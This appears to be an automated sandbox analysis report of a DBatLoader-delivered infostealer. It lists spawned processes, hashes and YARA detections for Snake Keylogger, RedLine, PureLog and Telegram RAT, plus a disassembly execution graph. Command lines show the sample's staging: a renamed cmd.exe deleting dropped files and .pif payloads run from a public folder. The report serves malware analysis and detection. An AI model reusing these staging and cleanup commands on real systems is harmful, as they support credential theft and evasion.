                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000002.1586646546.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.1494549261.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000002.1615024855.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:11
                                                                                                        Start time:10:30:27
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                                        Imagebase:0x7ff7ab120000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:12
                                                                                                        Start time:10:30:28
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
                                                                                                        Imagebase:0x7ff7ab120000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:14
                                                                                                        Start time:10:30:36
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                        Imagebase:0xa40000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:15
                                                                                                        Start time:10:30:36
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:16
                                                                                                        Start time:10:30:36
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Imagebase:0x400000
                                                                                                        File size:175'800 bytes
                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B61B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000010.00000001.1581941889.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000010.00000002.2726799985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 3%, ReversingLabs
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:18
                                                                                                        Start time:10:30:47
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\Cneehezx.PIF
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\Public\Libraries\Cneehezx.PIF"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'019'392 bytes
                                                                                                        MD5 hash:46FC1E1BCA07585CF21CC37149F2B424
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:20
                                                                                                        Start time:10:30:49
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                        Imagebase:0xa40000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:21
                                                                                                        Start time:10:30:49
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:22
                                                                                                        Start time:10:30:49
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Imagebase:0x400000
                                                                                                        File size:175'800 bytes
                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000016.00000001.1707089110.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032A86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032ECC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000016.00000002.2726848233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:23
                                                                                                        Start time:10:30:55
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\Cneehezx.PIF
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\Public\Libraries\Cneehezx.PIF"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'019'392 bytes
                                                                                                        MD5 hash:46FC1E1BCA07585CF21CC37149F2B424
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:24
                                                                                                        Start time:10:30:56
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                        Imagebase:0xa40000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:25
                                                                                                        Start time:10:30:56
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:26
                                                                                                        Start time:10:30:56
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Imagebase:0x7ff7194a0000
                                                                                                        File size:175'800 bytes
                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.00000000229ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000002.2726733311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000001.1780155418.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.00000000229B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        Has exited:false

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.5%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:25.4%
                                                                                                          Total number of Nodes:1411
                                                                                                          Total number of Limit Nodes:28
                                                                                                          execution_graph 16837 7ff7ab127a40 16840 7ff7ab127d30 memset 16837->16840 16839 7ff7ab127a5a 16872 7ff7ab12ca40 16840->16872 16845 7ff7ab123278 166 API calls 16864 7ff7ab13af91 16845->16864 16848 7ff7ab13af7e 16849 7ff7ab13af89 16848->16849 16857 7ff7ab13af72 16848->16857 16850 7ff7ab131ea0 8 API calls 16849->16850 16850->16864 16854 7ff7ab13afae 16854->16857 16866 7ff7ab13afce 16854->16866 16856 7ff7ab127ea4 16858 7ff7ab127eb7 ??_V@YAXPEAX 16856->16858 16859 7ff7ab127ec3 16856->16859 16857->16845 16858->16859 16931 7ff7ab138f80 16859->16931 16860 7ff7ab13b024 16863 7ff7ab123278 166 API calls 16860->16863 16863->16864 16864->16839 16866->16864 17015 7ff7ab123278 16866->17015 16870 7ff7ab127e09 16870->16854 16870->16856 16870->16857 16870->16860 16870->16864 16920 7ff7ab131ea0 16870->16920 16927 7ff7ab12b900 16870->16927 16939 7ff7ab13823c FindFirstFileExW 16870->16939 16953 7ff7ab128b20 16870->16953 16992 7ff7ab12b364 16870->16992 16998 7ff7ab128940 16870->16998 17004 7ff7ab138a70 16870->17004 17009 7ff7ab133a0c 16870->17009 16873 7ff7ab12ca59 16872->16873 16874 7ff7ab127dc3 16872->16874 17018 7ff7ab139324 16873->17018 16874->16857 16883 7ff7ab13417c 16874->16883 16877 7ff7ab13c6e0 17022 7ff7ab146d1c 16877->17022 16878 7ff7ab12ca84 16880 7ff7ab12ca9b memset 16878->16880 16881 7ff7ab13c706 ??_V@YAXPEAX 16878->16881 16880->16874 16884 7ff7ab1341a8 GetCurrentDirectoryW 16883->16884 16885 7ff7ab1341d4 towupper 16883->16885 16891 7ff7ab1341b9 16884->16891 17094 7ff7ab13081c GetEnvironmentVariableW 16885->17094 16888 7ff7ab138f80 7 API calls 16890 7ff7ab127dee 16888->16890 16889 7ff7ab13ecac towupper 16892 7ff7ab12d3f0 16890->16892 16891->16888 16893 7ff7ab12d810 16892->16893 16894 7ff7ab12d420 16892->16894 17245 7ff7ab12b998 16893->17245 16897 7ff7ab13caad 16894->16897 16898 7ff7ab12d46e GetProcessHeap HeapAlloc 16894->16898 16896 7ff7ab12d515 16915 7ff7ab12d544 16896->16915 16899 7ff7ab123278 166 API calls 16897->16899 16898->16897 16903 7ff7ab12d49a 16898->16903 16900 7ff7ab13cab7 16899->16900 16902 7ff7ab139158 7 API calls 16902->16915 16903->16896 16904 7ff7ab12d4e8 wcschr 16903->16904 16903->16915 16904->16903 16905 7ff7ab13ca31 wcschr 16905->16915 16906 7ff7ab12d54a iswspace 16909 7ff7ab12d561 wcschr 16906->16909 16906->16915 16907 7ff7ab12d5ee GetProcessHeap HeapReAlloc 16907->16897 16908 7ff7ab12d61d GetProcessHeap HeapSize 16907->16908 16908->16915 16909->16915 16910 7ff7ab12d586 wcschr 16910->16915 16911 7ff7ab12d6ff iswspace 16912 7ff7ab12d712 wcschr 16911->16912 16911->16915 16912->16915 16913 7ff7ab12d668 16916 7ff7ab138f80 7 API calls 16913->16916 16914 7ff7ab12d759 wcschr 16914->16915 16915->16897 16915->16902 16915->16905 16915->16906 16915->16907 16915->16910 16915->16911 16915->16913 16915->16914 16917 7ff7ab12d6c5 wcschr 16915->16917 16918 7ff7ab13ca5a wcschr 16915->16918 17274 7ff7ab14e91c 16915->17274 16919 7ff7ab127dfb 16916->16919 16917->16915 16918->16915 16919->16848 16919->16870 16921 7ff7ab131eae wcschr 16920->16921 16922 7ff7ab131ec4 16920->16922 16921->16922 16923 7ff7ab131ece 16921->16923 16922->16870 16924 7ff7ab131f3f 16923->16924 16925 7ff7ab139158 7 API calls 16923->16925 